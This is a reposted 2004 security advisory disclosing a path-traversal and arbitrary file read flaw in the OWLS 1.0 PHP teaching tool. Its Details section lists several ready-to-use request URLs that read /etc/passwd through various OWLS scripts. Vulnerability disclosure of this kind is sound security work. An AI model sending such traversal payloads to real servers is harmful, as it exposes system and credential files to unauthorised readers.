Risks
Vulnerabilities
Browse by

OWLS 1.0 Arbitrary File Disclosure Vulnerability
19 February 2004
Bookmark and Share
From: ZetaLabs <zetalabs(at)zone-h.org>

ZH2004-08SA (security advisory): OWLS 1.0 Remote arbitrary files retrieving

Discovered: 05 january 2004
Vendor contacted: 07 january 2004
Published: 18 february 2004
Name: OWLS
Affected Systems: 1.0
Issue: Remote file retrieving
Author: G00db0y from Zone-h Security Labs - g00db0y@zone-h.org - zetalabs@zone-h.org
Vendor: http://www.foolsworkshop.com/owls/

Description
***********

Zone-h Security Team has discovered a flaw in OWLS 1.0. There is a vulnerability in the current version of OWLS that allows an attacker to retrieve arbitrary files from the webserver with its priviledges. "OWLS is a web-based environment for instructors of language to easily create exercises, readings, glossaries, and present media for their students. Once installed on a web server that supports PHP, instructors can create materials or upload media for presentation to their students through a simple form based interface"

Details
*******

It's possibile for a remote attacker to retrieve any file from a webserver. Multiple files are affected with this problem.

For example try this:

http://address/owls/glossaries/index.php?file=/etc/passwd

http://address/owls/multiplechoice/index.php?file=../..
/../../../../../../../../../../../../../etc/passwd&view=print

http://address/owls/readings/index.php?filename=/etc/passwd

http://address/owls/multiplechoice/resultsignore.php?filename=/etc/passwd

http://address/owls/workshop/glossary.php?editfile=../
../../../../../../../../../../../../../../etc/passwd

http://address/owls/workshop/newmultiplechoice.php?edit=1&;
editfile=../../../../../../../../../../../../../../../etc/passwd

Solution:
*********

The vendor has been contacted and a patch was not yet produced.

G00db0y from Zone-h Security Labs - g00db0y@zone-h.org - zetalabs@zone-h.org

http://www.zone-h.org/en/advisories/read/id=3973/



Spotlight

The CSO perspective on healthcare security and compliance

Posted on 20 May 2013.  |  Randall Gamby is the CSO of the Medicaid Information Service Center of New York. In this interview he discusses healthcare security and compliance challenges and offers a variety of tips.


Daily digest

By subscribing to our early morning news update, you will receive a daily digest of the latest security news published on Help Net Security.
  

Weekly newsletter

With over 500 issues so far, reading our newsletter every Monday morning will keep you up-to-date with security risks out there.
  

 
DON'T
MISS

Tue, May 21st
    COPYRIGHT 1998-2013 BY HELP NET SECURITY.   // READ OUR PRIVACY POLICY // ABOUT US // ADVERTISE //